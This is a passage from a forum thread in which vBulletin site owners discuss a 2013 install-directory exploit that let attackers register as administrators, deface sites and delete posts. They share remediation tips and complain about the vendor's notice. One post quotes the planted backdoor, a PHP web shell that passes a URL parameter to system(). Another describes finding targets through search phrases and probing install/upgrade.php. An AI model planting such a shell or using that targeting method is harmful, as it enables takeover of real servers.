A new type hack method?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Jamsoft
    Member
    • Jun 2011
    • 71

    #16
    Originally posted by DF031
    I agree, what about all those admins not visiting the forums ?

    VB should have contacted all forum owners. It is not too late to do that and provide this basic support !
    Agreed!! I "happened" to see this in the CP yesterday, and went ahead and did what they said. BUT, they didnt say "check to see if you had admin accounts to see if you have been compromised. I did what they asked and researched no further. Today I am out like 40,000 posts that were deleted early this morning.

    how about an email to all owners, not only with a fix, but what to check to see if you've been compromised? Handled very badly

    Comment

    • Reignman
      New Member
      • Dec 2011
      • 25
      • 4.1.x

      #17
      Originally posted by Hawkmoth
      As above. This problem was found on Tuesday morning about 11 am Japan time. Like reignman, we had 2 people registered as federal. One is now deleted and the other had all permissions removed an PW changed. I have no idea how he got in. All new members receive an email with an activation link in it. They have to click to become active but even then they only go into a admin queue for final approval. Supposedly, no one can do anything until admin approval and only admins can do it, not mods. Maybe Abdou found some way to make himself an admin but I don't know how.

      I have also found a file "federal" in the plugin and that is removed. We only have vb software and vb advanced for the front page (with all our language forums). vba is the only plugin that is set up. All "abdou" did is deface our frontpage. The forum works fine from forum/php page. I have removed the install file as Zachary has indicated. But the problem has not been resolved.

      NB; vis a vis Abdou, we may have identified him and some of his hacker friends. Since our website runs on a US server Abdou has violated federal law (maybe USC Title 18 but I don't have the citation in front of me). Abdou has been reported to law enforcement agencies in the USA and UK among others. If anyone else has been hacked and you have any LE friends, let them know.
      He gets admin priviliges when registering to the forum (using the exploit) So he can do whatever he wants.

      Another warning to forum owners: if your password in config.php is equal to your ftp/server passwords, you have to change these passwords.

      Comment

      • Reignman
        New Member
        • Dec 2011
        • 25
        • 4.1.x

        #18
        Originally posted by Jamsoft

        Agreed!! I "happened" to see this in the CP yesterday, and went ahead and did what they said. BUT, they didnt say "check to see if you had admin accounts to see if you have been compromised. I did what they asked and researched no further. Today I am out like 40,000 posts that were deleted early this morning.

        how about an email to all owners, not only with a fix, but what to check to see if you've been compromised? Handled very badly
        Yes, that was a big mistake. I don't know why CP message didn't incluse this "added admins" warning.

        By the way, are you sure that these messages were deleted by this hacker called "abdou" ?

        Comment

        • Infection
          Member
          • Jan 2007
          • 33
          • 3.6.x

          #19
          I have the same problem. The hacker has registered as an Admin, then created this a plugin with the hook location ajax_start:

          Code:
          if(isset($_GET['lol'])){echo
          "<h1>pwn</h1><pre>"; system($_GET
          ['lol']);exit;}
          Please advise. I don't have the install directory at all prior to this hack.

          Comment

          • Reignman
            New Member
            • Dec 2011
            • 25
            • 4.1.x

            #20
            Originally posted by Infection
            I have the same problem. The hacker has registered as an Admin, then created this a plugin with the hook location ajax_start:

            Code:
            if(isset($_GET['lol'])){echo
            "<h1>pwn</h1><pre>"; system($_GET
            ['lol']);exit;}
            Please advise. I don't have the install directory at all prior to this hack.
            Which version do you use? If you use vBulletin 5, install directory is inside core directory. >>> /core/install

            He needs install/upgrade.php in order to complete hijacking, so if you don't have "install" directory and still you have the above problem, that means it's another vulnerability.

            Comment

            • KryptonSite
              Member
              • Apr 2004
              • 31

              #21
              I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.

              I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?

              Comment

              • Infection
                Member
                • Jan 2007
                • 33
                • 3.6.x

                #22
                Originally posted by Reignman

                Which version do you use? If you use vBulletin 5, install directory is inside core directory. >>> /core/install

                He needs install/upgrade.php in order to complete hijacking, so if you don't have "install" directory and still you have the above problem, that means it's another vulnerability.
                I'm using version 4.2.0 (I've yet to update to the latest 4.2.1 version). There is definitely no "install" directory in my forum's root folder, as far as I can see. It could be another vulnerability.

                Does anyone have any ideas as to what this could be?

                Comment

                • Reignman
                  New Member
                  • Dec 2011
                  • 25
                  • 4.1.x

                  #23
                  Originally posted by KryptonSite
                  I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.

                  I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?
                  Do you have any "strange" plugin on your vbulletin products? It's one of the smyptoms of this exploit.

                  Originally posted by Infection

                  I'm using version 4.2.0 (I've yet to update to the latest 4.2.1 version). There is definitely no "install" directory in my forum's root folder, as far as I can see. It could be another vulnerability.

                  Does anyone have any ideas as to what this could be?
                  Probably it's another one. Better contact to vbulletion support.

                  Bad thing is I see slight changes on codes, hacking messages. So I think it's now spreaded around.

                  Comment

                  • Jntu Hub
                    Senior Member
                    • May 2011
                    • 237
                    • 4.2.X

                    #24
                    my site was hacked with new name
                    www.jntuhub.com | www.jntuhub.in |

                    Comment

                    • DemOnstar
                      Senior Member
                      • Nov 2012
                      • 1912

                      #25
                      How does something like this get around so quickly?
                      Not a robot, or a macro, this is an individual or group of individuals exploiting a vulnerability...
                      I haven't been affected yet, maybe because I was active in the admin cp at the time of the notification and deleted the install folder?

                      But is the install folder the hole? Has this been clarified?

                      How do they find a vulnerable site to begin with? Surely there is no google search term 'vulnerable vB sites'.

                      What do they search for in order to complete the job?


                      Comment

                      • Reignman
                        New Member
                        • Dec 2011
                        • 25
                        • 4.1.x

                        #26
                        Originally posted by DemOnstar
                        How does something like this get around so quickly?
                        Not a robot, or a macro, this is an individual or group of individuals exploiting a vulnerability...
                        I haven't been affected yet, maybe because I was active in the admin cp at the time of the notification and deleted the install folder?

                        But is the install folder the hole? Has this been clarified?

                        How do they find a vulnerable site to begin with? Surely there is no google search term 'vulnerable vB sites'.

                        What do they search for in order to complete the job?
                        Yes, hole is in the install folder (at least for this exploit)

                        They search for vbulletin powered websites using phrases like (powered by vbulletin 4.2.0 / 4.2.1 / 5) and then they check manually if install folder exists by typing domain.com/forumpath/install/upgrade.php

                        If it exists they complete the job using exploit they found. (I wonder if vbulletin team has found what is it yet??? ) If it doesn't exist, they turn back to "Google" and search for other potential victims.

                        But what we know is they can use this exploit for only 4.2.0+ and 5 versions of vbulletin.
                        Last edited by Reignman; Mon 2 Sep '13, 5:01am.

                        Comment


                        • DemOnstar
                          DemOnstar commented
                          Editing a comment
                          Very good Reignman, that is exactly what I wanted to hear...It seems so easy to mess up someones life..and all that is needed is a search on Google.. Extraordinary!
                      • mat8861
                        New Member
                        • Jan 2011
                        • 20

                        #27
                        What about VB not sending an advice email to licensed members ?? I was here for another problem and now I am reading this thread, really surprised !!

                        Comment

                        • djsteve007
                          New Member
                          • Dec 2012
                          • 8
                          • 3.8.x

                          #28
                          Looks like I got hit with a similar exploit - they did not deface my site like the OP's - not yet anyway. They did find a way to add about 10 new users, all with the same username, (Th3H4ck) and all with admin privs.

                          I would not have known about this vulnerability, or the active exploit, if they had not .. maybe I should not post what triggered my knowledge of this.

                          I would of like to have received an email about this exploit. Now going to 302 redirect to my buddypress install. Hope my host has backup database and files from 5 days ago. Fingers crossed.

                          vbulletin 4.2.1 running, and had new member moderation turned on -

                          what I wonder is how they were able to run sql insert commands from /forums/core/install/upgrade.php --- when I do not even have a /core/ or /core/install/ folder on this server.

                          Will we get an email if the exploit fix is found?

                          Comment

                          • DemOnstar
                            Senior Member
                            • Nov 2012
                            • 1912

                            #29
                            Originally posted by djsteve007

                            Will we get an email if the exploit fix is found?
                            I think that is extremely likely now. Although, stranger things can happen..


                            Comment

                            • Reignman
                              New Member
                              • Dec 2011
                              • 25
                              • 4.1.x

                              #30
                              Originally posted by djsteve007
                              vbulletin 4.2.1 running, and had new member moderation turned on -

                              what I wonder is how they were able to run sql insert commands from /forums/core/install/upgrade.php --- when I do not even have a /core/ or /core/install/ folder on this server.
                              If you use version 4, you don't have /core/install but only /install in your forum root.

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...